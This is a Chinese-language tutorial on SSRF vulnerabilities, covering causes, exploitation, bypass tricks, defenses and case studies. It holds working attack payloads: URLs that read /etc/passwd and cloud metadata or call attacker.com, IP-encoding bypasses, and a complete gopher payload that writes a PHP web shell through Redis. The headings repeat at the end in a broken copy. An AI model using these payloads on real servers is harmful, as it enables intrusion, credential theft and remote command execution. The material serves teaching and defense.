SSRF漏洞分析教学文档<\/h1>

1. SSRF漏洞概述<\/h2>
SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种安全漏洞，攻击者能够诱使服务器向内部或外部的任意系统发起非预期的网络请求。<\/p>

1.1 漏洞本质<\/h3>

服务器未对用户提供的URL进行充分验证<\/li>
服务器信任了来自客户端的请求目标<\/li>

攻击者可以绕过访问控制，使服务器成为攻击代理<\/li> <\/ul>

2. SSRF漏洞成因<\/h2>

2.1 常见触发点<\/h3>

从URL获取数据的函数\/方法<\/li>
文件上传功能<\/li>
远程资源加载<\/li>
API调用<\/li>

服务器端重定向<\/li> <\/ul>

2.2 危险函数\/协议<\/h3>

file_get_contents()<\/code><\/li>
fsockopen()<\/code><\/li>
curl_exec()<\/code><\/li>
http:\/\/<\/code>, https:\/\/<\/code><\/li>
file:\/\/<\/code><\/li>
dict:\/\/<\/code><\/li>
sftp:\/\/<\/code><\/li>
ldap:\/\/<\/code><\/li>

gopher:\/\/<\/code> (特别危险)<\/li>
<\/ul>
3. SSRF攻击场景<\/h2>
3.1 内部服务探测<\/h3>

扫描内网IP和端口<\/li>
访问云服务元数据接口（如AWS\/阿里云\/腾讯云等）<\/li>
访问数据库管理界面<\/li>
<\/ul>
3.2 敏感数据读取<\/h3>

读取服务器本地文件(file:\/\/<\/code>)<\/li>
访问受保护的内部API<\/li>
获取配置文件<\/li>
<\/ul>
3.3 服务端请求伪造<\/h3>

发起内部系统攻击<\/li>
绕过IP白名单限制<\/li>
作为跳板攻击第三方系统<\/li>
<\/ul>
4. SSRF漏洞利用技术<\/h2>
4.1 基本利用<\/h3>
\/\/ 示例漏洞代码
<\/span><\/span><\/span><\/span>$url =<\/span> $_GET['url'<\/span>];
<\/span><\/span>$data =<\/span> file_get_contents<\/span>($url);
<\/span><\/span><\/code><\/pre>攻击Payload:<\/p>
http:\/\/victim.com\/vuln.php?url=http:\/\/attacker.com
http:\/\/victim.com\/vuln.php?url=file:\/\/\/etc\/passwd
http:\/\/victim.com\/vuln.php?url=http:\/\/169.254.169.254\/latest\/meta-data\/
<\/code><\/pre>
4.2 高级绕过技术<\/h3>


IP地址编码绕过<\/p>

十进制IP: http:\/\/2130706433<\/code> = http:\/\/127.0.0.1<\/code><\/li>
十六进制IP: http:\/\/0x7f000001<\/code> = http:\/\/127.0.0.1<\/code><\/li>
八进制IP: http:\/\/0177.0.0.01<\/code> = http:\/\/127.0.0.1<\/code><\/li>
<\/ul>
<\/li>

域名重定向<\/p>

使用短URL服务<\/li>
使用可控的302跳转<\/li>
<\/ul>
<\/li>

协议滥用<\/p>

dict:\/\/<\/code>协议泄露服务信息<\/li>
gopher:\/\/<\/code>协议构造任意TCP请求<\/li>
<\/ul>
<\/li>
<\/ul>
5. SSRF防御措施<\/h2>
5.1 输入验证<\/h3>

白名单域名\/IP<\/li>
禁止内部IP段<\/li>
验证URL格式<\/li>
<\/ul>
5.2 安全配置<\/h3>

禁用危险协议(file:\/\/<\/code>, gopher:\/\/<\/code>, dict:\/\/<\/code>等)<\/li>
设置CURLOPT_PROTOCOLS限制允许的协议<\/li>
使用curl时设置CURLOPT_HTTPPROXYTUNNEL为false<\/li>
<\/ul>
5.3 网络层防护<\/h3>

服务器网络隔离<\/li>
关键服务访问控制<\/li>
云服务元数据接口保护<\/li>
<\/ul>
5.4 代码示例<\/h3>
\/\/ 安全的URL验证函数
<\/span><\/span><\/span><\/span>function<\/span> isSafeUrl<\/span>($url) {
<\/span><\/span>    $parsed =<\/span> parse_url<\/span>($url);
<\/span><\/span>    
<\/span><\/span>    \/\/ 禁止file协议
<\/span><\/span><\/span><\/span>    if<\/span>(isset<\/span>($parsed['scheme'<\/span>]) &&<\/span> in_array<\/span>(strtolower<\/span>($parsed['scheme'<\/span>]), ['file'<\/span>, 'gopher'<\/span>, 'dict'<\/span>])) {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 禁止内部IP
<\/span><\/span><\/span><\/span>    $ip =<\/span> gethostbyname<\/span>($parsed['host'<\/span>]);
<\/span><\/span>    if<\/span>(filter_var<\/span>($ip, FILTER_VALIDATE_IP<\/span>, FILTER_FLAG_NO_PRIV_RANGE<\/span> |<\/span> FILTER_FLAG_NO_RES_RANGE<\/span>) ===<\/span> false<\/span>) {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 白名单验证
<\/span><\/span><\/span><\/span>    $whitelist =<\/span> ['example.com'<\/span>, 'api.trusted.com'<\/span>];
<\/span><\/span>    if<\/span>(!<\/span>in_array<\/span>($parsed['host'<\/span>], $whitelist)) {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 检测与审计<\/h2>
6.1 漏洞检测方法<\/h3>

黑盒测试：尝试各种协议和IP格式<\/li>
代码审计：查找危险函数调用<\/li>
流量监控：分析服务器发起的异常请求<\/li>
<\/ul>
6.2 自动化工具<\/h3>

SSRFmap<\/li>
Gopherus<\/li>
Burp Suite Collaborator<\/li>
<\/ul>
7. 实际案例分析<\/h2>
7.1 云服务元数据泄露<\/h3>
http:\/\/vuln.com\/load?url=http:\/\/169.254.169.254\/latest\/meta-data\/
<\/code><\/pre>
7.2 Redis未授权访问<\/h3>
gopher:\/\/127.0.0.1:6379\/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$30%0d%0a%0a%0a%3C?php%20system($_GET[cmd])%20?%3E%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a\/var\/www\/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
<\/code><\/pre>
8. 进阶研究<\/h2>
8.1 DNS重绑定攻击<\/h3>

利用TTL为0的DNS记录绕过IP检查<\/li>
首次解析为合法IP，后续解析为内部IP<\/li>
<\/ul>
8.2 盲SSRF<\/h3>

无回显的SSRF<\/li>
通过时间延迟、DNS查询等方式检测<\/li>
<\/ul>
9. 参考资源<\/h2>

OWASP SSRF备忘单<\/li>
SSRF漏洞CWE分类：CWE-918<\/li>
云服务元数据接口文档<\/li>
<\/ul>

本教学文档涵盖了SSRF漏洞的核心知识点，包括漏洞原理、利用技术、防御措施和实际案例。建议开发人员和安全工程师深入理解这些内容，并在实际工作中应用相应的防护措施。<\/p>

SSRF漏洞分析教学文档<\/h1>

1. SSRF漏洞概述<\/h2> SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种安全漏洞，攻击者能够诱使服务器向内部或外部的任意系统发起非预期的网络请求。<\/p>

2. SSRF漏洞成因<\/h2>

3. SSRF攻击场景<\/h2>

4. SSRF漏洞利用技术<\/h2>

5. SSRF防御措施<\/h2>

6. 检测与审计<\/h2>

7. 实际案例分析<\/h2>

8. 进阶研究<\/h2>

1. SSRF漏洞概述<\/h2>
SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种安全漏洞，攻击者能够诱使服务器向内部或外部的任意系统发起非预期的网络请求。<\/p>